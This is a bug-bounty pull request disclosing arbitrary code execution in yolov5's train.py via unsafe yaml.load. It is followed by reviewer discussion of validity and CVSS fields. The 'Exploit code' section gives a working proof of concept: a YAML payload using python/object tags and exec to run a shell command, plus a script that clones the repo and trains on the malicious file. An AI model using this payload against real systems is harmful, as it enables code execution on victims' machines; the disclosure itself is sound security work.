### PR TITLE
Arbitrary Code Execution in training code of Yolov5 Object Detection Model

### PR DESCRIPTION
**Pull request by B3EF**
# Description
**Arbitrary Code Excecution** in ultralytics/yolov5.
Yolov5 is a Object Detection model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of vision AI services, spanning from simple expert advice up to delivery of fully customized, end-to-end production solutions.
# Technical Description
This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function **load()** in **yaml**. **NOTE : ** the fix iis to be done in **train.py**
# Exploit code
**Python File**
```python
import os
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''
os.system('git clone https://github.com/ultralytics/yolov5.git')
os.chdir('yolov5/')
os.system('rm exploit.yml')
open('exploit.yml','w+').write(exploit)
os.system('python train.py --data exploit.yml --cfg exploit.yml --weights "" --batch-size 24')
```
# POC
* Run the exploit code 

## 💥 Impact
code execution
## ✅ Checklist
- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

**Comment by adam-nygate** [comment]
@B3EF this seems like an issue in a known vulnerable dependency of the project, rather than a vulnerability in the project itself. Closing for now, but please let me know if you feel differently.

**Review by mzfr — COMMENTED** [review]
The `train.py` is the main file of the project which causes this problem so I think this should be a valid issue since the exploit file doesn't have to be placed in a separate directory.

what do you think @bbeale @mufeedvh @Mik317 ?

**Review by Mik317 — APPROVED** [review]
LGTM :smile: :cake:

Screenshot from 2020-12-16 16-30-45

Yeah @mzfr :smile:, I think we can accept this since files don't have to be located in a specific path and the file used is supposed to analyze `yml` data, so it's likely to happen that somebody processes a malicious `yml` file :100:  

Cheers,
Mik

File: bounties/other/yolov5/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,50 @@
...
+    "PR": "",
+    "UI": "",
+    "S": "",
+    "C": "",
+    "I": "",
+    "A": "",
+    "E": "",
+    "RL": "",
+    "RC": "",
+    "Score": "7.x"
```
Comment (JamieSlome) [inline bounties/other/yolov5/1/vulnerability.json:34]: Please specify a full CVSS score - thanks! 🍰

File: bounties/other/yolov5/1/vulnerability.json [hunk 2]
```diff
@@ -0,0 +1,50 @@
...
+  },
+  "CVEs": [""], 
+  "Repository": {
+    "URL": "https://github.com/ultralytics/yolov5",
+    "Codebase": ["python"],
```
Comment (JamieSlome) [inline bounties/other/yolov5/1/vulnerability.json:39]: Capitalise `Python`.

**Pull request merged**